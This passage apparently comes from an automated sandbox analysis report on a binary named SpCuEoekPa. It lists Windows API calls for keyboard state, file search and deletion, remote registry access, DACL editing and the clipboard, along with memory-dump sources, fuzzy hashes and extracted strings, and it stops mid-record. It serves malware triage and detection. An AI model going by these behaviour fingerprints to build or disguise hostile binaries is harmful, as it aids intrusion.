                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0039D748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
                                                            • Instruction ID: 642f822bd2240e4c38d888727cb78c8fe6e8e9668414d566be5a52567aacc48b
                                                            • Opcode Fuzzy Hash: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
                                                            • Instruction Fuzzy Hash: 91317271A40358BFEF326FA19C8AF7F7E6CEB44B50F114125FA04EA1D1C6B15940AAA0
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003CC78D
                                                            • FindClose.KERNEL32(00000000), ref: 003CC7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 003CC844
                                                            • __swprintf.LIBCMT ref: 003CC890
                                                            • __swprintf.LIBCMT ref: 003CC8D3
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • __swprintf.LIBCMT ref: 003CC927
                                                              • Part of subcall function 00383698: __woutput_l.LIBCMT ref: 003836F1
                                                            • __swprintf.LIBCMT ref: 003CC975
                                                              • Part of subcall function 00383698: __flsbuf.LIBCMT ref: 00383713
                                                              • Part of subcall function 00383698: __flsbuf.LIBCMT ref: 0038372B
                                                            • __swprintf.LIBCMT ref: 003CC9C4
                                                            • __swprintf.LIBCMT ref: 003CCA13
                                                            • __swprintf.LIBCMT ref: 003CCA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
                                                            • Instruction ID: e16c48491cee95dcb14b8ecef6b17fffa87df88b2bc20cacf8227015758be932
                                                            • Opcode Fuzzy Hash: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
                                                            • Instruction Fuzzy Hash: C2A11EB1414344ABC712EF94C885EAFB7ECAF99704F40492EF595CB191EB35DA08CB62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CEFB6
                                                            • _wcscmp.LIBCMT ref: 003CEFCB
                                                            • _wcscmp.LIBCMT ref: 003CEFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 003CEFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 003CF00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 003CF026
                                                            • FindClose.KERNEL32(00000000), ref: 003CF031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 003CF04D
                                                            • _wcscmp.LIBCMT ref: 003CF074
                                                            • _wcscmp.LIBCMT ref: 003CF08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CF09D
                                                            • SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF0C5
                                                            • FindClose.KERNEL32(00000000), ref: 003CF0D2
                                                            • FindClose.KERNEL32(00000000), ref: 003CF0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
                                                            • Instruction ID: 62c06bf3e2beeefdd051011c2849bdfdc9a893b09839c69d217e6add4f1f6cd8
                                                            • Opcode Fuzzy Hash: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
                                                            • Instruction Fuzzy Hash: DF3105365002686FCB26ABA0DC88FEE77AD9F45720F1042BAE800D6091DB70DE80CB55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -es$0D@$0E@$0F@$3c7$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG@$_7
                                                            • API String ID: 0-239065333
                                                            • Opcode ID: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
                                                            • Instruction ID: 3c8ce6f38daeacb16a2c5e56dacd14d8b56b597aa3c79f7cc123968890f5d65e
                                                            • Opcode Fuzzy Hash: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
                                                            • Instruction Fuzzy Hash: 6672AD71E006198BDB26CF59C8A17EEB7F5FF44314F54816AE909EB680E7349E81CB90
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E0953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,003EF910,00000000,?,00000000,?,?), ref: 003E09C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003E0A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003E0A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 003E0DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E0DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: a35c569a2ddec3a76136a772c59df95707cdb476f1415500c07d3c1ceb880ce5
                                                            • Instruction ID: e2b8aa4084c12192a0151a2575a702e3e0af799f96e291798a7cf136fd89a66c
                                                            • Opcode Fuzzy Hash: a35c569a2ddec3a76136a772c59df95707cdb476f1415500c07d3c1ceb880ce5
                                                            • Instruction Fuzzy Hash: 83026B756006519FCB16EF25C881E2AB7E9FF89324F05855DF8999B3A2CB70EC41CB81
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CF113
                                                            • _wcscmp.LIBCMT ref: 003CF128
                                                            • _wcscmp.LIBCMT ref: 003CF13F
                                                              • Part of subcall function 003C4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003C43A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 003CF16E
                                                            • FindClose.KERNEL32(00000000), ref: 003CF179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 003CF195
                                                            • _wcscmp.LIBCMT ref: 003CF1BC
                                                            • _wcscmp.LIBCMT ref: 003CF1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003CF1E5
                                                            • SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF20D
                                                            • FindClose.KERNEL32(00000000), ref: 003CF21A
                                                            • FindClose.KERNEL32(00000000), ref: 003CF22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
                                                            • Instruction ID: 7000f4e104f9e9c6c7ce85e7f4f7c0bc7919bfd83d3326c331a01eb0e498d7be
                                                            • Opcode Fuzzy Hash: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
                                                            • Instruction Fuzzy Hash: AF31073A5002596FCB22AB60EC58FEE77AE9F45320F1506B9E800E61D0DB70DF45CB54
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003CA20F
                                                            • __swprintf.LIBCMT ref: 003CA231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 003CA26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003CA293
                                                            • _memset.LIBCMT ref: 003CA2B2
                                                            • _wcsncpy.LIBCMT ref: 003CA2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003CA323
                                                            • CloseHandle.KERNEL32(00000000), ref: 003CA32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 003CA337
                                                            • CloseHandle.KERNEL32(00000000), ref: 003CA341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
                                                            • Instruction ID: ba1c5b4f21d56e6aa00b59bdf367cacd3d1b1439e6c6483b1a82b48e7abc9f9e
                                                            • Opcode Fuzzy Hash: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
                                                            • Instruction Fuzzy Hash: B831C87590425DABDB22DFA0DC85FEB77BCEF88744F1041BAF508D6190E7709A448B25
                                                            APIs
                                                              • Part of subcall function 003B8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B821E
                                                              • Part of subcall function 003B8202: GetLastError.KERNEL32(?,003B7CE2,?,?,?), ref: 003B8228
                                                              • Part of subcall function 003B8202: GetProcessHeap.KERNEL32(00000008,?,?,003B7CE2,?,?,?), ref: 003B8237
                                                              • Part of subcall function 003B8202: HeapAlloc.KERNEL32(00000000,?,003B7CE2,?,?,?), ref: 003B823E
                                                              • Part of subcall function 003B8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B8255
                                                              • Part of subcall function 003B829F: GetProcessHeap.KERNEL32(00000008,003B7CF8,00000000,00000000,?,003B7CF8,?), ref: 003B82AB
                                                              • Part of subcall function 003B829F: HeapAlloc.KERNEL32(00000000,?,003B7CF8,?), ref: 003B82B2
                                                              • Part of subcall function 003B829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003B7CF8,?), ref: 003B82C3
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003B7D13
                                                            • _memset.LIBCMT ref: 003B7D28
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003B7D47
                                                            • GetLengthSid.ADVAPI32(?), ref: 003B7D58
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 003B7D95
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003B7DB1
                                                            • GetLengthSid.ADVAPI32(?), ref: 003B7DCE
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003B7DDD
                                                            • HeapAlloc.KERNEL32(00000000), ref: 003B7DE4
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003B7E05
                                                            • CopySid.ADVAPI32(00000000), ref: 003B7E0C
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003B7E3D
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003B7E63
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003B7E77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 8395670e53fc56e7ca74a30924f0dd620e0182abf6fd8bc5e0faef05f353cc48
                                                            • Instruction ID: 65d0a2ce6b4db9f63f7ccbafed1bea301d332500942dcc2cd12340b6a4d9adbc
                                                            • Opcode Fuzzy Hash: 8395670e53fc56e7ca74a30924f0dd620e0182abf6fd8bc5e0faef05f353cc48
                                                            • Instruction Fuzzy Hash: F0613D71904209AFDF12DFA4DC85AEEBB79FF44304F048269F915AA291DB71DE05CBA0
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 003C0097
                                                            • SetKeyboardState.USER32(?), ref: 003C0102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 003C0122
                                                            • GetKeyState.USER32(000000A0), ref: 003C0139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 003C0168
                                                            • GetKeyState.USER32(000000A1), ref: 003C0179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 003C01A5
                                                            • GetKeyState.USER32(00000011), ref: 003C01B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 003C01DC
                                                            • GetKeyState.USER32(00000012), ref: 003C01EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 003C0213
                                                            • GetKeyState.USER32(0000005B), ref: 003C0221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
                                                            • Instruction ID: b71b0a55b0dc8c633f166851dc64926a6d3f31064f5bcdad924b2fbee38c6101
                                                            • Opcode Fuzzy Hash: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
                                                            • Instruction Fuzzy Hash: 7F51DB249047D899FB3BDBA08854FAABFB49F01380F09459E95C19A5C3DAA49F8CC761
                                                            APIs
                                                              • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E04AC
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003E054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003E05E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003E0822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 6a9efaa7ebbfdf035e3f7b4d43dd1ece0f56d56a955fc4035902a6719e41c775
                                                            • Instruction ID: 828a36e16fb88f0a58a21f0a51bc54ec917977a3d4a679e1a1f6e4cfea3dd248
                                                            • Opcode Fuzzy Hash: 6a9efaa7ebbfdf035e3f7b4d43dd1ece0f56d56a955fc4035902a6719e41c775
                                                            • Instruction Fuzzy Hash: 46E16D71604250AFCB16DF25C891E2ABBE8FF89314F04C56DF84ADB2A2D670ED45CB91
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • CoInitialize.OLE32 ref: 003D8403
                                                            • CoUninitialize.OLE32 ref: 003D840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,003F2BEC,?), ref: 003D846E
                                                            • IIDFromString.OLE32(?,?), ref: 003D84E1
                                                            • VariantInit.OLEAUT32(?), ref: 003D857B
                                                            • VariantClear.OLEAUT32(?), ref: 003D85DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: ae33ac5455e99e11dc573a5c795631cd894bcda3b476919f44a57b9c54c7bcf5
                                                            • Instruction ID: 6e24c6e979911c987482c2ea11a81094000eb65b6c591bddd86a6add62ab9566
                                                            • Opcode Fuzzy Hash: ae33ac5455e99e11dc573a5c795631cd894bcda3b476919f44a57b9c54c7bcf5
                                                            • Instruction Fuzzy Hash: 9C61BF726083129FC712DF55E888F6AB7E9AF49714F00451EF9819B391CB70ED44CB92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
                                                            • Instruction ID: 4088fff98d02be1f3041d5c9050f016c83f5a3fbdc3d15d0c00f66168e5dc555
                                                            • Opcode Fuzzy Hash: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
                                                            • Instruction Fuzzy Hash: 8D219C76600210DFDB22AF64EC49B6A7BACEF55710F10852AF946DF2A1DB70AD01CB54
                                                            APIs
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                              • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003C38A3
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003C394B
                                                            • MoveFileW.KERNEL32(?,?), ref: 003C395E
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003C397B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C399D
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003C39B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
                                                            • Instruction ID: e3daee18caa00cf050d1abb0e9299bb95ab89c6a1c6f994598ff05b19aa1b007
                                                            • Opcode Fuzzy Hash: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
                                                            • Instruction Fuzzy Hash: 9851AF3180414CAACF17EBA0D992EEDB778AF11304F60816DE402BB195EF706F09CB61
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003CF440
                                                            • Sleep.KERNEL32(0000000A), ref: 003CF470
                                                            • _wcscmp.LIBCMT ref: 003CF484
                                                            • _wcscmp.LIBCMT ref: 003CF49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 003CF53D
                                                            • FindClose.KERNEL32(00000000), ref: 003CF553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
